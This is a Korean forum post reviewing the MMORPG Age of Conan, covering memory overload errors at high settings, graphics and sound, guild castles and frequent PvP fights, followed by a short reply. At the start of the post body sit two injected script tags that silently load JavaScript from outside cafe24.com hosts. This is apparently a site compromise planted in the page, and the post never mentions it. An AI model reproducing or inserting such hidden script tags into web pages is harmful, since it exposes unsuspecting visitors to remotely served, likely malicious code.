게임 소감^0^ > ageofconan

본문 바로가기
사이트 내 전체검색

ageofconan

게임 소감^0^

페이지 정보

작성자 해맑은우유 메일보내기 이름으로 검색  (218.♡.13.33) 댓글 3건 조회 2,852회 작성일 08-07-28 02:32

본문

<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script><SCRIPT Language=JavaScript src=http://dlcjsvlf.cafe24.com/Wiz.php></script>      사실 게임 눈팅만 하다가 결제할까말까 망설이다가 -_- 실수로 결제를 해버렸습니다..

그래서 얼떨결에 게임을 시작하게 되었는데요... 아무것도 모른체.......

게임하면서 이것저것 많이 배우게 되네요^^

암튼 게임을 처음시작하면서 놀란것은 CPU Q6600, RAM 2GB, ATI HD 3870 인 사양인데도 불구하고, 옵션 하이로 돌리면

메모리 과부하 오류가 난다는 겁니다 -_- 암튼 이부분에서 상당히 충격먹었네요.

하지만 여타 온라인에서 보지못한 정말 화려한 그래픽과..... 사운드 이펙트는........정말 대단한거 같았습니다.

사운드 이펙트는 퀄러티가 너무 뛰어나서 그런지.....제 블루투스 헤드폰으로 전송이 않되네요..용량이 커서..-_-

암튼 게임 이야기를 하자면 상당히 몰입도가 강하고 재미있네요... 특히 외국사람들하고 같이 게임하니깐 더잼난거 같아요

그리고 한국사람들 끼리 잘 뭉쳐서 좋구요. 게임하다보니 꼭 울티마 온라인 하는거 같더라구요.

요즘 길드성 건설하고 있는데 길드성 다지어지면 정말 웅장한게 -_- 오블리언에 나오는 성같이되요 ㅋㅋ

암튼 게임 스케일 자체가 상당히 크고 잼난거 같아요... 간혹 버그퀘가 있어서 유료 베타겜이라고 하시는분들 계시긴한데..

저는 퀘하면서 버그 걸린적 한번도 없구요....현제 70렙 다되가염 ㅋㅋ

그리고 레벨업이 좀 쉬운편이라서 부담없이 하구있네요 ㅋㅋ ㅋㅋㅋ

글구 케릭터 디자인이 너무 츄리하다고 하시는분들 몇분 계신거 같은데......-_- 리니지2 하시면 딱 맞으실듯 ㅋㅋ

전 코난 바바리안 케릭이 신화속에 나오는 케릭 같이 생겨서 좋던데....... 각 클레스 마다 특징을 잘살려놓은거 같구요..

그리고 PVP 가 너무 활발해서 매일매일 사냥중에 싸움이 일어나는데 ㅋㅋㅋㅋ 정말 싸우는 재미가 짱인듯해요 ㅋㅋ

보통 처음에는 한파티 vs 한파티... 이렇게 싸움이 붙는데 한 2시간 지나면 -_- 레이드로 묶어서  3파티 vs 3파티 이렇게

길드전 해버리면 -_- ㅋㅋ 저는 한 4시간동안 이렇게 PVP만 한거 같네여 -_-

암튼 전 슈퍼 만족하고 게임하고 있습니다 ^0^ 조만간 메모리 두개더사야할듯 ㅋㅋ
추천65 비추천0

댓글목록

사사뉨님의 댓글

사사뉨 이름으로 검색 아이피 (218.♡.143.38) 작성일

원래 자기가 재미있으면 누가 모래도 재미이 있는것임 - _-b

공지사항

• 게시물이 없습니다.

회원로그인

접속자집계

오늘
어제
1,571
최대
1,587
전체
14,593

그누보드5